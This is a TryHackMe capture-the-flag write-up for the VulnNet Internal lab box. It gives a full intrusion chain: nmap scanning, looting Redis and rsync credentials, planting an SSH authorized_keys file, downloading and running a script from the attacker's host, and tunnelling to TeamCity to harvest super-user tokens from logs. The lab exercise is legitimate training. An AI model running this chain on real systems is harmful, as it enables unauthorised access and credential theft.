CTF VulnNet Internal

CTFTryHackMe
, , , ,

nmap

1
nmap -p- -T5 -sV -vvv 10.10.210.193

Output:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
PORT      STATE    SERVICE     REASON      VERSION
22/tcp    open     ssh         syn-ack     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
111/tcp   open     rpcbind     syn-ack     2-4 (RPC #100000)
139/tcp   open     netbios-ssn syn-ack     Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open     netbios-ssn syn-ack     Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
873/tcp   open     rsync       syn-ack     (protocol version 31)
2049/tcp  open     nfs_acl     syn-ack     3 (RPC #100227)
6379/tcp  open     redis       syn-ack     Redis key-value store
9090/tcp  filtered zeus-admin  no-response
44305/tcp open     nlockmgr    syn-ack     1-4 (RPC #100021)
50597/tcp open     mountd      syn-ack     1-3 (RPC #100005)
55125/tcp open     mountd      syn-ack     1-3 (RPC #100005)
58261/tcp open     mountd      syn-ack     1-3 (RPC #100005)
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel

SMB

1
//smbclient //10.10.210.193/shares -U "guest"

NFS

1
2
sudo pacman -S nfs-utils
sudo mount -t nfs 10.10.210.193:/opt/conf /home/peanutstick/Documents/CTF/THM/vulnet_internal/mount

The config files are interesting, we have the service redis.
Let’s grab the password.

B65Hx562F@ggAZ@F

Redis

https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis

1
2
3
4
5
nc -vn 10.10.210.193 6379
AUTH B65Hx562F@ggAZ@F
SELECT 0
KEYS *
GET "internal flag"


Get “authlist”:

1
LRANGE "authlist" 0 -1

Decode the hash:

1
echo QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg== |base64 -d

Output:

1
Authorization for rsync://[email protected] with password Hcg3HP67@TW@Bc72v

Rsync

List the files:
rsync -av --list-only rsync://10.10.210.193

Copy files.
rsync -av rsync://[email protected]/files ./files


We have the flag, tree don’t list the uden flags.

https://medium.com/r3d-buck3t/attack-insecure-rsync-service-928951af34ed
There is a .ssh, we can upload a authorized_keys to conncet via ssh.

1
ssh-keygen -t rsa


Then upload it:

1
rsync authorized_keys rsync://[email protected]/files/sys-internal/.ssh

Connect to ssh:

1
ssh -i A_rsa [email protected]

SSH

lse.sh

Then:

1
2
3
wget http://10.8.50.167:8000/lse.sh
chmod +x *
./lse.sh


yeah but I don’t have my password

8111

Port forwarding

https://hideandsec.sh/books/cheatsheets-82c/page/pivoting

1
ss

The port 8111 is open:

1
ssh -i A_rsa [email protected] -D 8111:127.0.0.1:8111 -N

http://127.0.0.1:8111/login.html

Click on “as a Super user” then:

1
2
cd /TeamCity/logs
grep --color=auto -rnw '.' -ie "token" --color=always 2> /dev/null

Output:

1
2
3
4
5
6
./catalina.out:56:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
./catalina.out:57:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
./catalina.out:1402:[TeamCity] Super user authentication token: 3782562599667957776 (use empty username with the token as the password to access the server)
./catalina.out:1457:[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
./catalina.out:1526:[TeamCity] Super user authentication token: 6152940187709854289 (use empty username with the token as the password to access the server)
./catalina.out:1583:[TeamCity] Super user authentication token: 6152940187709854289 (use empty username with the token as the password to access the server)


once the command is in the build step, start the listener then click on run.